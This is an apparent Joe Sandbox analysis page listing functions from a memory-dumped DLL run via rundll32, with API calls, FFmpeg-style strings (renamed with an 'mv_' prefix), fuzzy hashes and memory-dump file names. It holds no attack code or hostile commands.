API ID: strlen$_aligned_reallocmv_freepmv_realloc
String ID:
API String ID: 895301365-0
Opcode ID: d1a8473bf65fe5948635b3fdb6a704e42311342a774be7d21ac7218014880f97
Instruction ID: 4ab28d8c1afc1d5d21c0288313e81dd6decefd2b0a989d53a21eca3f7d4547be
Opcode Fuzzy Hash: d1a8473bf65fe5948635b3fdb6a704e42311342a774be7d21ac7218014880f97
Instruction Fuzzy Hash: 2F21AEB8908316CFCB54DF28C08095AB7E5FF89344F558A5DE999AB301D731EA46CF82

Uniqueness

Uniqueness Score: -1.00%

Function 100A01C0 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 100A01D9
_unlock.MSVCRT ref: 100A0201
calloc.MSVCRT ref: 100A024F

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 0688a122be4117893fb3ece507c896a8d7c3e445b4a648a9370480a80a91a21a
Instruction ID: 8fe92059074c50cb47f0fafd9c3e369871995c2eed6e667d345993090a648f63
Opcode Fuzzy Hash: 0688a122be4117893fb3ece507c896a8d7c3e445b4a648a9370480a80a91a21a
Instruction Fuzzy Hash: A81149B1604305CFDB80DFA8C48475ABBE0EF88340F15C6A9E888CF245EB74D840CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1001232B Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

mv_bprint_escape.F072 ref: 100122B3

Part of subcall function 10009730: mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB

mv_bprint_append_data.F072 ref: 100122CC
mv_bprint_escape.F072 ref: 100122EE
mv_bprint_finalize.F072 ref: 1001231B
mv_bprint_append_data.F072 ref: 1001234B

Part of subcall function 10008F30: mv_realloc.F072 ref: 10008F73

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprintfmv_realloc
String ID:
API String ID: 1942445456-0
Opcode ID: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
Instruction ID: 403ebcfaa7f6bf6d2df9c5cc3f9910434a712b72dc8362acc2447b37bc06364c
Opcode Fuzzy Hash: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
Instruction Fuzzy Hash: 752199B59183019FD360DF29C08069AFBE1FB89348F50892EE58CC7301E736E981CB46

Uniqueness

Uniqueness Score: -1.00%

Function 1001D7A0 Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

mv_buffer_unref.F072 ref: 1001D7D9
mv_freep.F072 ref: 1001D7E8
mv_freep.F072 ref: 1001D7FA
mv_freep.F072 ref: 1001D809
mv_freep.F072 ref: 1001D815

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_buffer_unref
String ID:
API String ID: 1375661620-0
Opcode ID: b5ec8d363419cb92d8bdb1f38329e2028d6a2324dcebd7ef3df8143324761c55
Instruction ID: d52695f6b373eec4d5e7979f8718589b80dc3da3b7455b83048969c7455da62b
Opcode Fuzzy Hash: b5ec8d363419cb92d8bdb1f38329e2028d6a2324dcebd7ef3df8143324761c55
Instruction Fuzzy Hash: 7B0172B86086058FDB00EF79C485A1AF7F1FF84244F46CD6DE8948B316E634E885CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1000C7D9 Relevance: 7.5, APIs: 5, Instructions: 36stringCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 1000C7E0
strtol.MSVCRT ref: 1000C804
_errno.MSVCRT ref: 1000C80B
_errno.MSVCRT ref: 1000C822
_errno.MSVCRT ref: 1000C848

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _errno$strtol
String ID:
API String ID: 3596500743-0
Opcode ID: 7ebbe4887208d3a811f5f7b53f87de9f50cb6efb863a80ebecaab125b7496197
Instruction ID: 4b89768cd935a08b72e57307d992163ee312e19cf8de062bdca3011805c3dd3e
Opcode Fuzzy Hash: 7ebbe4887208d3a811f5f7b53f87de9f50cb6efb863a80ebecaab125b7496197
Instruction Fuzzy Hash: 6A01C47490931A8FD784DF65C48861BBBE1FF84754F15C82DE989C7324EB34E9048B45

Uniqueness

Uniqueness Score: -1.00%

Function 1001F3B7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

mv_log.F072 ref: 1001F4EF

Part of subcall function 1001F080: mv_mallocz.F072 ref: 1001F0A0
Part of subcall function 1001F080: mv_realloc_f.F072 ref: 1001F0DD
Part of subcall function 1001F080: mv_buffer_create.F072 ref: 1001F128

Strings

Could not create the texture (%lx), xrefs: 1001F504
Static surface pool size exceeded., xrefs: 1001F4DB

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_createmv_logmv_malloczmv_realloc_f
String ID: Could not create the texture (%lx)$Static surface pool size exceeded.
API String ID: 22886632-350389734
Opcode ID: 12dea1e201e8f5d438329ade5418983e4152c6497013e786b6b6d990fad55280
Instruction ID: d0ee2a216646596517f8e2272bb6c8791eb02a2e11f7fe46a603028adb549b45
Opcode Fuzzy Hash: 12dea1e201e8f5d438329ade5418983e4152c6497013e786b6b6d990fad55280
Instruction Fuzzy Hash: 5C4188B5A087419FC744DF29C58061ABBE1FF88700F51896EF8999B316E774E984CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1000D684 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

mv_bprintf.F072 ref: 1000D64E
mv_bprintf.F072 ref: 1000D678
mv_bprintf.F072 ref: 1000D715

Strings

@%s, xrefs: 1000D642

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: @%s
API String ID: 3083893021-2921637043
Opcode ID: c4bd400a84f836f8168436f958854a5664bfff359e734bd969f61d6a5558c79a
Instruction ID: bde4f2789606c19ab050fa63e9045ae12eeb8ea4b86e9135c35405d0853ffa6a
Opcode Fuzzy Hash: c4bd400a84f836f8168436f958854a5664bfff359e734bd969f61d6a5558c79a
Instruction Fuzzy Hash: 89215A759097068BE310EF19C48026EF7E1FF88394F12892EE88897315E731ED44CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10026730 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

mv_log.F072 ref: 10026792
mv_log.F072 ref: 100267AC

Strings

If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org), xrefs: 10026797
is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented., xrefs: 10026780

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log
String ID: is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented.$If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org)
API String ID: 2418673259-452301706
Opcode ID: e6cf6ba8b22bf0788caeb5b2bc13ebdcd15b2fa09116b02164e182888be3a209
Instruction ID: cd8e871a35f16579d6f3ce221cb9c29d0fa83c6cca779b8fa567d44589e44066
Opcode Fuzzy Hash: e6cf6ba8b22bf0788caeb5b2bc13ebdcd15b2fa09116b02164e182888be3a209
Instruction Fuzzy Hash: 93110978A087458BD344DF19EA8021EBBE2FFCC744F91C92DE4888B355DA34D9449B82

Uniqueness

Uniqueness Score: -1.00%

Function 10009784 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097AD
mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C05
mv_bprintf.F072(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C65

Strings

>, xrefs: 100097E9
&, xrefs: 1000979B

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprintf
String ID: &$>
API String ID: 3083893021-624094588
Opcode ID: f6f8d3d5fc7b62e55630e6ba9b01de786338a4dbd923bb065a803ba8d4e77ea4
Instruction ID: 827a1dd9a6b26f0f52677796166c22f358f1b9d0e9bb7a9b4a6d704745ef5d9f
Opcode Fuzzy Hash: f6f8d3d5fc7b62e55630e6ba9b01de786338a4dbd923bb065a803ba8d4e77ea4
Instruction Fuzzy Hash: B6F03071C08B55CADB50EFA485503AAB7E5EB453D0F81480EE5DA9B249CB34FC86C782

Uniqueness

Uniqueness Score: -1.00%

Function 100267C7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

mv_log.F072 ref: 10026792
mv_log.F072 ref: 100267AC

Strings

If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org), xrefs: 10026797
is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented., xrefs: 10026780

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log
String ID: is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented.$If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org)
API String ID: 2418673259-452301706
Opcode ID: 726f5603a65502359e655967f00b1600284beb5137becb6436dd4fcad8af556a
Instruction ID: 749b7b172e694e1bef6e0ea00623f78dc4c312dad7cdc32441d2dd052aa7ac3c
Opcode Fuzzy Hash: 726f5603a65502359e655967f00b1600284beb5137becb6436dd4fcad8af556a
Instruction Fuzzy Hash: D7F09DB8A087059BC744DF29D98026EBBE0EFCD744F90CD2DA49897355DA38E9449B82

Uniqueness

Uniqueness Score: -1.00%

Function 100267B9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

mv_log.F072 ref: 10026792
mv_log.F072 ref: 100267AC

Strings

If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org), xrefs: 10026797
is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented., xrefs: 10026780

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log
String ID: is not implemented. Update your FFmpeg version to the newest one from Git. If the problem still occurs, it means that your file has a feature which has not been implemented.$If you want to help, upload a sample of this file to https://streams.videolan.org/upload/ and contact the ffmpeg-devel mailing list. (ffmpeg-devel@ffmpeg.org)
API String ID: 2418673259-452301706
Opcode ID: 8c63f5b068e4a02c16e5e4e3d6ed8fca3382fd8153a0e1c5dc78481aba7fba1a
Instruction ID: 20e3eb0074f28b37b3f93e03534fea868915181d0f0dff0f0c45d1e812b63dfd
Opcode Fuzzy Hash: 8c63f5b068e4a02c16e5e4e3d6ed8fca3382fd8153a0e1c5dc78481aba7fba1a
Instruction Fuzzy Hash: 54F0AFB8A087049BC344DF29D98025EBBE0EFCC744F90CC2DA49897351DA38DA449B82

Uniqueness

Uniqueness Score: -1.00%

Function 1001B0A4 Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

mv_image_fill_linesizes.F072 ref: 1001B0C8

Part of subcall function 100215D0: mv_pix_fmt_desc_get.F072(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,1001B0CD), ref: 100215E6

mv_image_fill_plane_sizes.F072 ref: 1001B15D
mv_buffer_alloc.F072 ref: 1001B1CD
mv_image_fill_pointers.F072 ref: 1001B1FC

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_allocmv_image_fill_linesizesmv_image_fill_plane_sizesmv_image_fill_pointersmv_pix_fmt_desc_get
String ID:
API String ID: 2879504290-0
Opcode ID: 104ea71f64bcf6d5fcf77d597bbab15b8274068533c11a176288c866d61d2df4
Instruction ID: 7a3e12a9aca585330d458c3661a5f2850fdcc4197d16b6054e58506080106dfe
Opcode Fuzzy Hash: 104ea71f64bcf6d5fcf77d597bbab15b8274068533c11a176288c866d61d2df4
Instruction Fuzzy Hash: 1F51F8B5608B018FCB48DF69D59066ABBE1FF88240F1589BDE949CB319E731E844CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1002B701 Relevance: 6.1, APIs: 4, Instructions: 109stringCOMMON

Download Yara Rule

APIs

mv_freep.F072 ref: 1002B71E
strlen.MSVCRT ref: 1002B735
mv_malloc.F072 ref: 1002B751

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freepmv_mallocstrlen
String ID:
API String ID: 2899962033-0
Opcode ID: b60561e94974d849901b234290bbe7a995fa381d40c40a5b191f302676304302
Instruction ID: 783c96028185269aaff1eccff1d3a6d32e800164aef8f2b7fbae3f80fe3a419f
Opcode Fuzzy Hash: b60561e94974d849901b234290bbe7a995fa381d40c40a5b191f302676304302
Instruction Fuzzy Hash: 51319975A08F154ED310EE79A4D13A67BC9DF82394FD1092FDE9887383C5369889C741

Uniqueness

Uniqueness Score: -1.00%

Function 100A02F0 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 100A0342
MultiByteToWideChar.KERNEL32 ref: 100A0385

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: ff6f7197c44d7e7dccd4158c33b178a144c6c1fe7609a9ede9ad65282b7dc5a0
Instruction ID: 7d595e0308f4db80fc988514bbf5ff759a63fd2ee38edf780f56cffaa40d1ea8
Opcode Fuzzy Hash: ff6f7197c44d7e7dccd4158c33b178a144c6c1fe7609a9ede9ad65282b7dc5a0
Instruction Fuzzy Hash: 3D31F4B1509351CFDB40DF69D48420ABBE0FF8A354F05896DF9D48B290E3B6DA48CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1001F080 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

mv_mallocz.F072 ref: 1001F0A0
mv_realloc_f.F072 ref: 1001F0DD

Part of subcall function 10028DE0: _aligned_realloc.MSVCRT ref: 10028E11

mv_buffer_create.F072 ref: 1001F128

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _aligned_reallocmv_buffer_createmv_malloczmv_realloc_f
String ID:
API String ID: 2794559729-0
Opcode ID: 26fbe21ab545ebdd34baa87320ddca8e1bb2c4f4deb69b9881e6a88837f94b66
Instruction ID: c869ac9f6eaa7e77a9466fdee6e8f712de869673a1390132f44f2bab79372784
Opcode Fuzzy Hash: 26fbe21ab545ebdd34baa87320ddca8e1bb2c4f4deb69b9881e6a88837f94b66
Instruction Fuzzy Hash: 8031ACB4A08701DFC300DF29C58051AFBF1FF98250F568A6EE9889B321D771E881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 100027B0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

mv_fifo_can_read.F072 ref: 100027C7
mv_fifo_can_write.F072 ref: 100027D6
mv_samples_get_buffer_size.F072 ref: 100027FF
mv_fifo_grow2.F072 ref: 10002833

Part of subcall function 10017F70: mv_realloc_array.F072(?,?,?,?,?,?,?,?,?,?,?,?,?,?,10002838), ref: 10017FAE

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
